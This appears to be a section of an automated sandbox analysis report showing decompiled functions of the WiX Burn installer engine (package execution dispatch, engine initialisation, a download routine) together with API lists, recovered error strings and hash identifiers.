                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalInitializeSection
                                                                                                                                                                  • String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleManufacturer$WixBundleProviderKey$WixBundleTag$WixBundleVersion
                                                                                                                                                                  • API String ID: 32694325-2405281954
                                                                                                                                                                  • Opcode ID: 86e6e70fd21a92a8e0e2970293805fc2a1a59c6e9df2f6bf5e2b1866e3f01252
                                                                                                                                                                  • Instruction ID: 1c99a4027d6cd3c27a9f6e8ce8fb465294e520e7cb9d760e94a37b429f8d164c
                                                                                                                                                                  • Opcode Fuzzy Hash: 86e6e70fd21a92a8e0e2970293805fc2a1a59c6e9df2f6bf5e2b1866e3f01252
                                                                                                                                                                  • Instruction Fuzzy Hash: 911239B0D153698BDB65CF5999887CDBAB8FB49704F1091EBE10CBA251C7B50B84CF88
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                                  			E0042051A(intOrPtr _a4, intOrPtr* _a8, void* _a12, intOrPtr _a16, long* _a20, intOrPtr* _a24, intOrPtr _a28, char _a32, intOrPtr* _a36) {
                                                                                                                                                                  				long _v8;
                                                                                                                                                                  				char _v12;
                                                                                                                                                                  				char _v16;
                                                                                                                                                                  				HANDLE* _v20;
                                                                                                                                                                  				void* _v24;
                                                                                                                                                                  				signed int _t59;
                                                                                                                                                                  				long _t66;
                                                                                                                                                                  				intOrPtr* _t69;
                                                                                                                                                                  				intOrPtr* _t73;
                                                                                                                                                                  
                                                                                                                                                                  				_t69 = _a36;
                                                                                                                                                                  				_t73 = _a8;
                                                                                                                                                                  				_t66 = 0;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				 *((intOrPtr*)(_a16 + 4)) = 0;
                                                                                                                                                                  				while(1) {
                                                                                                                                                                  					L1:
                                                                                                                                                                  					_t59 =  *_t73 - 1;
                                                                                                                                                                  					if(_t59 > 0xc) {
                                                                                                                                                                  						break;
                                                                                                                                                                  					}
                                                                                                                                                                  					switch( *((intOrPtr*)(_t59 * 4 +  &M0042076A))) {
                                                                                                                                                                  						case 0:
                                                                                                                                                                  							_t71 = _a24;
                                                                                                                                                                  							goto L4;
                                                                                                                                                                  						case 1:
                                                                                                                                                                  							__eax =  *(__esi + 8);
                                                                                                                                                                  							__ecx = _a12;
                                                                                                                                                                  							_v24 =  *(__esi + 8);
                                                                                                                                                                  							 &_v24 = 0;
                                                                                                                                                                  							__eflags = __ecx;
                                                                                                                                                                  							__eax = 0 | __eflags != 0x00000000;
                                                                                                                                                                  							_v20 = __ecx;
                                                                                                                                                                  							__eax = (__eflags != 0) + 1;
                                                                                                                                                                  							__eax = WaitForMultipleObjects((__eflags != 0) + 1,  &_v24, 0, 0xffffffff);
                                                                                                                                                                  							__eflags = __eax;
                                                                                                                                                                  							if(__eax != 0) {
                                                                                                                                                                  								__eflags = __eax - 1;
                                                                                                                                                                  								if(__eax == 1) {
                                                                                                                                                                  									__eax =  &_v8;
                                                                                                                                                                  									__eax = GetExitCodeThread(_a12,  &_v8);
                                                                                                                                                                  									__eflags = __eax;
                                                                                                                                                                  									if(__eax != 0) {
                                                                                                                                                                  										__eax = _v8;
                                                                                                                                                                  										__ecx = 0x8000ffff;
                                                                                                                                                                  										__eflags = __eax;
                                                                                                                                                                  										__eax =  >=  ? 0x8000ffff : __eax;
                                                                                                                                                                  										_push("Cache thread exited unexpectedly.");
                                                                                                                                                                  										L35:
                                                                                                                                                                  										_push(0x8000ffff);
                                                                                                                                                                  										_v8 = 0x8000ffff;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										__eax = GetLastError();
                                                                                                                                                                  										__ax & 0x0000ffff = __ax & 0x0000ffff | 0x80070000;
                                                                                                                                                                  										__eflags = __eax;
                                                                                                                                                                  										__ecx =  <=  ? __eax : __ax & 0x0000ffff | 0x80070000;
                                                                                                                                                                  										__eax = 0x80004005;
                                                                                                                                                                  										__eflags = __ecx;
                                                                                                                                                                  										_v8 = __ecx;
                                                                                                                                                                  										__eax = E004300D9(0x80004005, "apply.cpp", 0x615, __ecx);
                                                                                                                                                                  										_push("Failed to get cache thread exit code.");
                                                                                                                                                                  										goto L30;
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									__eax = GetLastError();
                                                                                                                                                                  									__ax & 0x0000ffff = __ax & 0x0000ffff | 0x80070000;
                                                                                                                                                                  									__eflags = __eax;
                                                                                                                                                                  									__ecx =  <=  ? __eax : __ax & 0x0000ffff | 0x80070000;
                                                                                                                                                                  									__eax = 0x80004005;
                                                                                                                                                                  									__eflags = __ecx;
                                                                                                                                                                  									_v8 = __ecx;
                                                                                                                                                                  									__eax = E004300D9(0x80004005, "apply.cpp", 0x620, __ecx);
                                                                                                                                                                  									_push("Failed to wait for cache check-point.");
                                                                                                                                                                  									L30:
                                                                                                                                                                  									_push(_v8);
                                                                                                                                                                  								}
                                                                                                                                                                  								goto L36;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								__ecx = _v8;
                                                                                                                                                                  								goto L7;
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L37;
                                                                                                                                                                  						case 2:
                                                                                                                                                                  							goto L34;
                                                                                                                                                                  						case 3:
                                                                                                                                                                  							 &_v12 =  &_v16;
                                                                                                                                                                  							__ecx = E00420B96(__ebx, __esi, __edi, 0,  &_v16, _a32,  &_v12);
                                                                                                                                                                  							_v8 = __ecx;
                                                                                                                                                                  							__eflags = __ecx;
                                                                                                                                                                  							if(__ecx >= 0) {
                                                                                                                                                                  								goto L7;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_push("Failed to execute EXE package.");
                                                                                                                                                                  								goto L10;
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L37;
                                                                                                                                                                  						case 4:
                                                                                                                                                                  							__eax =  &_v12;
                                                                                                                                                                  							_t30 =  &_a32; // 0x422365
                                                                                                                                                                  							__eax =  &_v16;
                                                                                                                                                                  							__ecx = E00420D99(__ebx, __esi, __edi, 0,  &_v16,  *_t30,  &_v12);
                                                                                                                                                                  							_v8 = __ecx;
                                                                                                                                                                  							__eflags = __ecx;
                                                                                                                                                                  							if(__ecx >= 0) {
                                                                                                                                                                  								goto L7;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_push("Failed to execute MSI package.");
                                                                                                                                                                  								goto L10;
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L37;
                                                                                                                                                                  						case 5:
                                                                                                                                                                  							 &_v12 =  &_v16;
                                                                                                                                                                  							__ecx = E00420EF5(__ebx, __esi, __edi, 0,  &_v16, _a32,  &_v12);
                                                                                                                                                                  							_v8 = __ecx;
                                                                                                                                                                  							__eflags = __ecx;
                                                                                                                                                                  							if(__ecx >= 0) {
                                                                                                                                                                  								goto L7;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_push("Failed to execute MSP package.");
                                                                                                                                                                  								goto L10;
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L37;
                                                                                                                                                                  						case 6:
                                                                                                                                                                  							 &_v12 =  &_v16;
                                                                                                                                                                  							__ecx = E004210B3(__ebx, __esi, __edi, 0,  &_v16, _a32,  &_v12);
                                                                                                                                                                  							_v8 = __ecx;
                                                                                                                                                                  							__eflags = __ecx;
                                                                                                                                                                  							if(__ecx >= 0) {
                                                                                                                                                                  								goto L7;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_push("Failed to execute MSU package.");
                                                                                                                                                                  								goto L10;
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L37;
                                                                                                                                                                  						case 7:
                                                                                                                                                                  							_push(__edi);
                                                                                                                                                                  							__ecx = E00421392(__ebx, __esi);
                                                                                                                                                                  							_v8 = __ecx;
                                                                                                                                                                  							__eflags = __ecx;
                                                                                                                                                                  							if(__ecx >= 0) {
                                                                                                                                                                  								goto L7;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_push("Failed to execute package provider registration action.");
                                                                                                                                                                  								goto L10;
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L37;
                                                                                                                                                                  						case 8:
                                                                                                                                                                  							_push(__edi);
                                                                                                                                                                  							__ecx = E00420AEC(__ebx, __esi);
                                                                                                                                                                  							_v8 = __ecx;
                                                                                                                                                                  							__eflags = __ecx;
                                                                                                                                                                  							if(__ecx >= 0) {
                                                                                                                                                                  								L7:
                                                                                                                                                                  								goto L23;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_push("Failed to execute dependency action.");
                                                                                                                                                                  								L10:
                                                                                                                                                                  								_push(__ecx);
                                                                                                                                                                  								L36:
                                                                                                                                                                  								E00430A57();
                                                                                                                                                                  								_t66 = _v8;
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L37;
                                                                                                                                                                  						case 9:
                                                                                                                                                                  							__ebx = _a20;
                                                                                                                                                                  							__eax =  *(__esi + 8);
                                                                                                                                                                  							 *_a20 =  *(__esi + 8);
                                                                                                                                                                  							__ebx = _a4;
                                                                                                                                                                  							goto L23;
                                                                                                                                                                  						case 0xa:
                                                                                                                                                                  							__edi = _a28;
                                                                                                                                                                  							L4:
                                                                                                                                                                  							 *_t71 =  *((intOrPtr*)(_t73 + 8));
                                                                                                                                                                  							L23:
                                                                                                                                                                  							_t64 = _v12;
                                                                                                                                                                  							if( *_t69 < _t64) {
                                                                                                                                                                  								 *_t69 = _t64;
                                                                                                                                                                  							}
                                                                                                                                                                  							if(_v16 != 0) {
                                                                                                                                                                  								if( *_t69 < 2) {
                                                                                                                                                                  									goto L1;
                                                                                                                                                                  								} else {
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  							L37:
                                                                                                                                                                  							return _t66;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				L34:
                                                                                                                                                                  				_push("Invalid execute action.");
                                                                                                                                                                  				goto L35;
                                                                                                                                                                  			}












                                                                                                                                                                  0x004206a1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004206a7
                                                                                                                                                                  0x004206a1
                                                                                                                                                                  0x00420763
                                                                                                                                                                  0x00420767
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00420551
                                                                                                                                                                  0x00420749
                                                                                                                                                                  0x0042074e
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000001,00422365,00000000,000000FF,00000001,00000000,00000000,00422365,00000001), ref: 00420585
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004206B1
                                                                                                                                                                  • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 004206F3
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004206FD
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to execute dependency action., xrefs: 0042066E
                                                                                                                                                                  • Failed to wait for cache check-point., xrefs: 004206E2
                                                                                                                                                                  • Cache thread exited unexpectedly., xrefs: 00420742
                                                                                                                                                                  • apply.cpp, xrefs: 004206D5, 00420721
                                                                                                                                                                  • Failed to execute MSI package., xrefs: 004205E5
                                                                                                                                                                  • Failed to get cache thread exit code., xrefs: 0042072E
                                                                                                                                                                  • Failed to execute package provider registration action., xrefs: 0042064F
                                                                                                                                                                  • Failed to execute EXE package., xrefs: 004205BC
                                                                                                                                                                  • Invalid execute action., xrefs: 0042074E
                                                                                                                                                                  • Failed to execute MSU package., xrefs: 00420633
                                                                                                                                                                  • e#B, xrefs: 004205CB
                                                                                                                                                                  • Failed to execute MSP package., xrefs: 0042060A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$CodeExitMultipleObjectsThreadWait
                                                                                                                                                                  • String ID: Cache thread exited unexpectedly.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to get cache thread exit code.$Failed to wait for cache check-point.$Invalid execute action.$apply.cpp$e#B
                                                                                                                                                                  • API String ID: 3703294532-1935626283
                                                                                                                                                                  • Opcode ID: c24750ac9159cf6318f308b19ec8673b3f3745369c6fddf7277ef4cdf1e6390a
                                                                                                                                                                  • Instruction ID: c31b6e43ad32a2bb0ad2fe137b35aa22a7f11620dc20ada2798a4e2daf7932e0
                                                                                                                                                                  • Opcode Fuzzy Hash: c24750ac9159cf6318f308b19ec8673b3f3745369c6fddf7277ef4cdf1e6390a
                                                                                                                                                                  • Instruction Fuzzy Hash: A3617F70B01319FFEB14DF65D955AAE7BF8EB48314F60406FE806E3281D338AA419B58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 69%
                                                                                                                                                                  			E004016ED(void** __ecx, signed int _a4, intOrPtr _a8) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				signed int _t47;
                                                                                                                                                                  				signed int _t51;
                                                                                                                                                                  				signed int _t52;
                                                                                                                                                                  				signed int _t54;
                                                                                                                                                                  				signed int _t57;
                                                                                                                                                                  				intOrPtr _t68;
                                                                                                                                                                  				signed int _t85;
                                                                                                                                                                  				void* _t87;
                                                                                                                                                                  				intOrPtr _t89;
                                                                                                                                                                  				signed int _t98;
                                                                                                                                                                  
                                                                                                                                                                  				_t83 = __ecx;
                                                                                                                                                                  				_push(__ecx);
                                                                                                                                                                  				_push(__ecx);
                                                                                                                                                                  				_t89 = _a8;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_t81 = _t89 + 0x88;
                                                                                                                                                                  				_v12 = 1;
                                                                                                                                                                  				if(E0040E522(__ecx, _t89 + 0x3bc, _t89 + 0x88,  *((intOrPtr*)(_t89 + 0x20)),  *((intOrPtr*)(_t89 + 0x158))) >= 0) {
                                                                                                                                                                  					_t47 = E00413CA0(_t89 + 0xf8, _t81);
                                                                                                                                                                  					__eflags = _t47;
                                                                                                                                                                  					if(_t47 >= 0) {
                                                                                                                                                                  						__eflags =  *((intOrPtr*)(_t89 + 0x460)) - 1;
                                                                                                                                                                  						if(__eflags != 0) {
                                                                                                                                                                  							L11:
                                                                                                                                                                  							_t51 = E00405A1B(_t83, __eflags, _t81, _t89 + 0xac,  *((intOrPtr*)(_t89 + 0x20)),  *((intOrPtr*)(_t89 + 0x158)), _t89 + 0xf4,  &_v12);
                                                                                                                                                                  							__eflags = _t51;
                                                                                                                                                                  							if(_t51 >= 0) {
                                                                                                                                                                  								__eflags = _v12;
                                                                                                                                                                  								if(_v12 != 0) {
                                                                                                                                                                  									__eflags =  *(_t89 + 0xb8);
                                                                                                                                                                  									if( *(_t89 + 0xb8) != 0) {
                                                                                                                                                                  										__eflags =  *((intOrPtr*)(_t89 + 0x20)) - 2;
                                                                                                                                                                  										if( *((intOrPtr*)(_t89 + 0x20)) > 2) {
                                                                                                                                                                  											E00417453(_a4, 0, _t89 + 0x34);
                                                                                                                                                                  										}
                                                                                                                                                                  									}
                                                                                                                                                                  									_t52 = E0041787A(_a4, _t89);
                                                                                                                                                                  									__eflags = _t52;
                                                                                                                                                                  									if(_t52 >= 0) {
                                                                                                                                                                  										__eflags = E00411B03(0, _t89);
                                                                                                                                                                  										if(__eflags >= 0) {
                                                                                                                                                                  											_t54 = E0040DE4D(_t87, __eflags,  *((intOrPtr*)(_t89 + 0x1c)), _t81);
                                                                                                                                                                  											__eflags = _t54;
                                                                                                                                                                  											if(_t54 >= 0) {
                                                                                                                                                                  												_t98 = E0040B4CD(0, _t89 + 0xf8, _t81);
                                                                                                                                                                  												__eflags = _t98;
                                                                                                                                                                  												if(_t98 >= 0) {
                                                                                                                                                                  													_t57 =  *(_t89 + 0x40);
                                                                                                                                                                  													_t85 = 0;
                                                                                                                                                                  													__eflags = _t57;
                                                                                                                                                                  													if(_t57 == 0) {
                                                                                                                                                                  														L31:
                                                                                                                                                                  														_a4 = _t85;
                                                                                                                                                                  														_t98 = E00401364(_t89,  &_a4);
                                                                                                                                                                  														__eflags = _t98;
                                                                                                                                                                  														if(_t98 < 0) {
                                                                                                                                                                  															_push("Failed while running ");
                                                                                                                                                                  															goto L35;
                                                                                                                                                                  														}
                                                                                                                                                                  														__eflags = _a4;
                                                                                                                                                                  														if(_a4 == 0) {
                                                                                                                                                                  															goto L37;
                                                                                                                                                                  														}
                                                                                                                                                                  														L30:
                                                                                                                                                                  														_t85 = 0;
                                                                                                                                                                  														__eflags = 0;
                                                                                                                                                                  														goto L31;
                                                                                                                                                                  													}
                                                                                                                                                                  													__eflags =  *_t57;
                                                                                                                                                                  													if( *_t57 == 0) {
                                                                                                                                                                  														goto L31;
                                                                                                                                                                  													}
                                                                                                                                                                  													_t98 = E0040461F(_t81, L"WixBundleLayoutDirectory", _t57, 0);
                                                                                                                                                                  													__eflags = _t98;
                                                                                                                                                                  													if(_t98 >= 0) {
                                                                                                                                                                  														goto L30;
                                                                                                                                                                  													}
                                                                                                                                                                  													_push("Failed to set layout directory variable to value provided from command-line.");
                                                                                                                                                                  													goto L35;
                                                                                                                                                                  												}
                                                                                                                                                                  												_push("Failed to set registration variables.");
                                                                                                                                                                  												goto L35;
                                                                                                                                                                  											}
                                                                                                                                                                  											_push("Failed to set action variables.");
                                                                                                                                                                  											goto L35;
                                                                                                                                                                  										}
                                                                                                                                                                  										_push("Failed to query registration.");
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_push("Failed to create the message window.");
                                                                                                                                                                  									}
                                                                                                                                                                  									goto L35;
                                                                                                                                                                  								}
                                                                                                                                                                  								_push(0xe0000035);
                                                                                                                                                                  								_push(2);
                                                                                                                                                                  								E00402003();
                                                                                                                                                                  								_t98 = 0;
                                                                                                                                                                  								goto L36;
                                                                                                                                                                  							}
                                                                                                                                                                  							_push("Failed to check global conditions");
                                                                                                                                                                  							goto L35;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t83 =  &_v8;
                                                                                                                                                                  						_t98 = E0040F31A(_t89 + 0x46c, 1,  &_v8);
                                                                                                                                                                  						__eflags = _t98;
                                                                                                                                                                  						if(_t98 >= 0) {
                                                                                                                                                                  							_t98 = E0040F9DC(_t89 + 0x46c);
                                                                                                                                                                  							__eflags = _t98;
                                                                                                                                                                  							if(_t98 >= 0) {
                                                                                                                                                                  								__eflags = _v8;
                                                                                                                                                                  								if(__eflags != 0) {
                                                                                                                                                                  									CloseHandle(_v8);
                                                                                                                                                                  									_t15 =  &_v8;
                                                                                                                                                                  									 *_t15 = _v8 & 0x00000000;
                                                                                                                                                                  									__eflags =  *_t15;
                                                                                                                                                                  								}
                                                                                                                                                                  								goto L11;
                                                                                                                                                                  							}
                                                                                                                                                                  							_push("Failed to connect to elevated parent process.");
                                                                                                                                                                  							goto L35;
                                                                                                                                                                  						}
                                                                                                                                                                  						_push("Failed to create pipes to connect to elevated parent process.");
                                                                                                                                                                  						goto L35;
                                                                                                                                                                  					}
                                                                                                                                                                  					_push("Failed to initialize internal cache functionality.");
                                                                                                                                                                  					goto L35;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_push("Failed to open log.");
                                                                                                                                                                  					L35:
                                                                                                                                                                  					_push(_t98);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  					L36:
                                                                                                                                                                  					_pop(_t85);
                                                                                                                                                                  					L37:
                                                                                                                                                                  					E0041783B(_t89);
                                                                                                                                                                  					E004046BD(_t85, _t87, _t89, _t81);
                                                                                                                                                                  					if( *((intOrPtr*)(_t89 + 0x47c)) != 0xffffffff) {
                                                                                                                                                                  						_t102 =  *((intOrPtr*)(_t89 + 0x460)) - 1;
                                                                                                                                                                  						if( *((intOrPtr*)(_t89 + 0x460)) != 1) {
                                                                                                                                                                  							_t68 = 0;
                                                                                                                                                                  							__eflags = 0;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t68 =  *((intOrPtr*)(_t89 + 0x18));
                                                                                                                                                                  						}
                                                                                                                                                                  						E0040F8E4(_t85, _t102, _t89 + 0x46c,  *((intOrPtr*)(_t89 + 0xf4)), _t68);
                                                                                                                                                                  					}
                                                                                                                                                                  					if(IsWindow( *(_t89 + 0x34)) != 0) {
                                                                                                                                                                  						PostMessageW( *(_t89 + 0x34), 0x10, 0, 0);
                                                                                                                                                                  					}
                                                                                                                                                                  					if(_v8 != 0) {
                                                                                                                                                                  						CloseHandle(_v8);
                                                                                                                                                                  					}
                                                                                                                                                                  					return _t98;
                                                                                                                                                                  				}
                                                                                                                                                                  			}
















                                                                                                                                                                  0x004018ef
                                                                                                                                                                  0x004018ff
                                                                                                                                                                  0x0040190a
                                                                                                                                                                  0x0040190a
                                                                                                                                                                  0x00401914
                                                                                                                                                                  0x00401919
                                                                                                                                                                  0x00401919
                                                                                                                                                                  0x00401925
                                                                                                                                                                  0x00401925

                                                                                                                                                                  APIs
                                                                                                                                                                  • IsWindow.USER32(?), ref: 004018F7
                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0040190A
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00401EA4,?,?), ref: 00401919
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to create the message window., xrefs: 0040181D
                                                                                                                                                                  • Failed to set action variables., xrefs: 00401849
                                                                                                                                                                  • Failed to check global conditions, xrefs: 004017CE
                                                                                                                                                                  • Failed while running , xrefs: 004018AF
                                                                                                                                                                  • Failed to open log., xrefs: 00401726
                                                                                                                                                                  • Failed to initialize internal cache functionality., xrefs: 00401743
                                                                                                                                                                  • Failed to set layout directory variable to value provided from command-line., xrefs: 0040188B
                                                                                                                                                                  • Failed to create pipes to connect to elevated parent process., xrefs: 0040176E
                                                                                                                                                                  • Failed to set registration variables., xrefs: 00401863
                                                                                                                                                                  • WixBundleLayoutDirectory, xrefs: 0040187A
                                                                                                                                                                  • Failed to query registration., xrefs: 00401833
                                                                                                                                                                  • Failed to connect to elevated parent process., xrefs: 0040178A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandleMessagePostWindow
                                                                                                                                                                  • String ID: Failed to check global conditions$Failed to connect to elevated parent process.$Failed to create pipes to connect to elevated parent process.$Failed to create the message window.$Failed to initialize internal cache functionality.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
                                                                                                                                                                  • API String ID: 3586352542-3026528549
                                                                                                                                                                  • Opcode ID: f7b44bc3f11affc01273d5d90a8f4bac3e26a8a3aebfdf9b4024578fffa955ab
                                                                                                                                                                  • Instruction ID: ffe905353efb8c78a0d7f0a80024e4e3b05be755896de8defb37191061d86c5f
                                                                                                                                                                  • Opcode Fuzzy Hash: f7b44bc3f11affc01273d5d90a8f4bac3e26a8a3aebfdf9b4024578fffa955ab
                                                                                                                                                                  • Instruction Fuzzy Hash: AC51C672A00616BBDB16A660CC85FFAB668FF04314F108237F905B61A0E73CEE5497D9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                                                  			E00425C78(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20, signed short _a24, signed short _a28, WCHAR* _a32) {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				void _v12;
                                                                                                                                                                  				signed int _v16;
                                                                                                                                                                  				long _v20;
                                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                                  				char _v28;
                                                                                                                                                                  				signed short _v32;
                                                                                                                                                                  				void* _v36;
                                                                                                                                                                  				long _v40;
                                                                                                                                                                  				char _v44;
                                                                                                                                                                  				signed int _t58;
                                                                                                                                                                  				WCHAR* _t69;
                                                                                                                                                                  				signed short _t86;
                                                                                                                                                                  				void* _t91;
                                                                                                                                                                  				void* _t95;
                                                                                                                                                                  				void* _t97;
                                                                                                                                                                  
                                                                                                                                                                  				_v16 = _v16 | 0xffffffff;
                                                                                                                                                                  				_t90 = _a20;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_t95 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                  				_v44 = 0;
                                                                                                                                                                  				_v40 = 0;
                                                                                                                                                                  				asm("xorps xmm0, xmm0");
                                                                                                                                                                  				asm("movlpd [ebp-0x18], xmm0");
                                                                                                                                                                  				asm("movlpd [ebp-0x20], xmm0");
                                                                                                                                                                  				if(E00433F88( &_v8,  *_a20, 0) >= 0) {
                                                                                                                                                                  					_t95 = InternetOpenW(L"Burn", 0, 0, 0, 0);
                                                                                                                                                                  					if(_t95 != 0) {
                                                                                                                                                                  						E0043856B(_t91, L"WiX\\Burn", L"DownloadTimeout", 0x78,  &_v12);
                                                                                                                                                                  						_t58 = _v12;
                                                                                                                                                                  						if(_t58 != 0) {
                                                                                                                                                                  							_v12 = _t58 * 0x3e8;
                                                                                                                                                                  							InternetSetOptionW(_t95, 2,  &_v12, 4);
                                                                                                                                                                  							InternetSetOptionW(_t95, 6,  &_v12, 4);
                                                                                                                                                                  							InternetSetOptionW(_t95, 5,  &_v12, 4);
                                                                                                                                                                  						}
                                                                                                                                                                  						_t97 = E004253F6(_a4, _a12, _a16, _t95,  &_v8,  *((intOrPtr*)(_t90 + 4)),  *((intOrPtr*)(_t90 + 8)),  &_v36,  &_v44);
                                                                                                                                                                  						if(_t97 >= 0) {
                                                                                                                                                                  							E004254B6(_t91, _a32,  &_v20,  &_v16,  &_v28);
                                                                                                                                                                  							_t97 = E0042515A(_a4, _a12, _a16, _t95,  &_v8,  *((intOrPtr*)(_t90 + 4)),  *((intOrPtr*)(_t90 + 8)), _a32, _a24, _a28, _v36, _v32, _v28, _v24, _v16, _a8);
                                                                                                                                                                  							if(_t97 >= 0) {
                                                                                                                                                                  								_t69 = _v20;
                                                                                                                                                                  								if(_t69 != 0 &&  *_t69 != 0) {
                                                                                                                                                                  									DeleteFileW(_t69);
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								E00430A57(_t97, "Failed to download URL: %ls", _v8);
                                                                                                                                                                  							}
                                                                                                                                                                  							if(_v16 != 0xffffffff) {
                                                                                                                                                                  								CloseHandle(_v16);
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							E00430A57(_t97, "Failed to get size and time for URL: %ls", _v8);
                                                                                                                                                                  						}
                                                                                                                                                                  						goto L16;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t86 = GetLastError();
                                                                                                                                                                  						_t101 =  <=  ? _t86 : _t86 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_t97 =  >=  ? 0x80004005 :  <=  ? _t86 : _t86 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						E004300D9(0x80004005, "downloadengine.cpp", 0x96, _t97);
                                                                                                                                                                  						_push("Failed to open internet session");
                                                                                                                                                                  						goto L2;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_push("Failed to copy download source URL.");
                                                                                                                                                                  					L2:
                                                                                                                                                                  					_push(_t97);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  					L16:
                                                                                                                                                                  					_t70 = _v20;
                                                                                                                                                                  					if(_v20 != 0) {
                                                                                                                                                                  						E004380AB(_t70);
                                                                                                                                                                  					}
                                                                                                                                                                  					if(_t95 != 0) {
                                                                                                                                                                  						InternetCloseHandle(_t95);
                                                                                                                                                                  					}
                                                                                                                                                                  					if(_v8 != 0) {
                                                                                                                                                                  						E004380AB(_v8);
                                                                                                                                                                  					}
                                                                                                                                                                  					return _t97;
                                                                                                                                                                  				}
                                                                                                                                                                  			}



















